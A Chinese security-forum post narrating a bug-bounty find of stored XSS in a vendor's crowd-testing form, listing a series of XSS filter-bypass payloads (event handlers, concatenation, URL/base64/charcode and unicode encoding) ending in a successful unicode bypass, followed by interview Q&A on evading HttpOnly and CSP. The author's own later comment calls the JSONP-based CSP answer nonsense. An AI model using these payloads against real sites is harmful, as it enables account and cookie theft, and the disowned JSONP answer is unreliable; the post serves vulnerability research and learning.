限时投稿-记一次补天专属SRC中危漏洞实战

astronaut   ·   发表于 2021-08-20 21:30:47   ·   实战纪实

前言

犹记某位师傅所说,有活动的地方就有可能出现漏洞,毕竟是新的业务点,本次漏洞也是与厂商搞的活动有关

记实

经过信息收集,发现其推出了众测活动,类似于0元试用,这无伤大雅,但其中的众测计划属实耐人寻味,因为我输入了<h1>加油</h1>以后,它返回给我的结果如下图所示

这说明填写众测计划时,是可以执行html语句的,这里可以尝试的操作是构造钓鱼链接,比如<a href="https://bbs.zkaq.cn/">我很来劲</a>

那试试能不能执行js呢,成立了就收获存储xss一枚

经初步测试发现,普通的弹窗对它来说是不起作用的

开始fuzz

利用拼接函数

  1. <svg onload="a(this);function a(){}(alert`1`)">
  2. <details ontoggle=this['ale'+'rt']`1` open>
  3. <audio src/onerror=self['pro'+'mpt'](1)>
  4. <img/src=1 onerror=window.alert(1)>

拦截

尝试不同属性

  1. <form action=javascript:alert(1)><input type=submit>
  2. <object data=javascript:alert(1)>

拦截

尝试不同标签

  1. <body onload=alert(1)>
  2. <marquee onstart=alert(1)>
  3. <audio src onloadstart=alert(1)>
  4. <video onloadstart=alert(1)><source>
  5. <form onsubmit=alert(1)><input type=submit>

拦截

蟹不肉

编码

  1. <details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >
  2. <details open ontoggle=eval(atob('YWxlcnQoMSk='))>
  3. <img/src=1 onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">
  4. < a href="javascript:al\u{65}rt(6)">XSS Test</ a>

最终,unicode编码成功绕过防护,网费拿下

后记

12期小老弟找工作中,本篇正好又聊到了xss,咱就扯几道面试题(总群里的)吧,同学们有更好的思路不妨一起学习交流

  1. Q1:如何绕过http-only?
  2. A1:首先谈谈http-only,它的作用仅仅是为了避免攻击者获得cookie信息,插还是能插的。再看如何绕过,可以说说风哥提到的这两点 -- csrf、借助phpinfo()让页面显示cookie。除此之外,还可以劫持钓鱼绕过,利用姿势为管理员触发xss后,当前页面即刻跳转至登陆界面,若管理员稍不留意填写了账号和密码,不就拿下了,为啥,因为登陆界面是伪造的。还有没有啥绕过方式,有啊,比如CVE-2012-005,只要攻击者向目标站点植入超大cookie,使得http头超过apache的最大请求长度,apache便会返回400状态码,以及被http-only保护的cookie
  3. Q2:谈一谈csp安全策略,以及如何绕过?
  4. A2:csp即为HTTP Header中的Content-Security-Policy,它存在的目的主要是通过白名单的方式告诉浏览器允许加载和不允许加载的资源。具体用法可以使用script-src,让浏览器只能加载指定规则下的js代码,其他的都一律拒绝。接着讲讲咋个绕过,姿势1 -- jsonp绕过,啥是jsonp,它首先基于json格式,存在的目的在于解决跨域请求资源,而它的原理则是动态地插入带有跨域url的script标签,然后调用回调函数,将用户所需的json数据作为参数传入,通过一些逻辑把数据显示在页面上,说到这儿,自然是明白如何通过它绕过csp了,还不是因为它允许不安全的回调方法,从而给攻击者执行xss创造了机会?直接callback=alert`1`就完事儿了。姿势2 -- 利用iframe的srcdoc属性绕过csp,但有前提,那就是应用得允许加载来自白名单域的iframe,满足了这个前提就可以插了,咋插?用手插

白白

用户名金币积分时间理由
Track-聂风 25.00 0 2021-08-24 16:04:09 活动打赏
Track-聂风 50.00 0 2021-08-24 16:04:00 一个受益终生的帖子~~

打赏我,让我更有动力~

3 Reply   |  Until 2021-12-14 | 2306 View

astronaut
发表于 2021-8-24

我金币呢

评论列表

  • 加载数据中...

编写评论内容

乐伟超
发表于 2021-8-26

童话里都是骗人的

评论列表

  • 加载数据中...

编写评论内容

astronaut
发表于 2021-12-14

最后Q2的jsonp劫持属于纯纯的胡诌,别信

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.